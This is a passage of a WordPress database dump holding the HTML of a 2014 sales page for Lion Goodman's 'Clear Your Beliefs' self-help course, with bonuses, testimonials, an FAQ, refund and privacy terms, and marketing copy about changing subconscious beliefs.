20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 16:39:04', '2014-06-17 21:39:04', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(942, 4194, '2014-06-17 16:41:10', '2014-06-17 21:41:10', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. 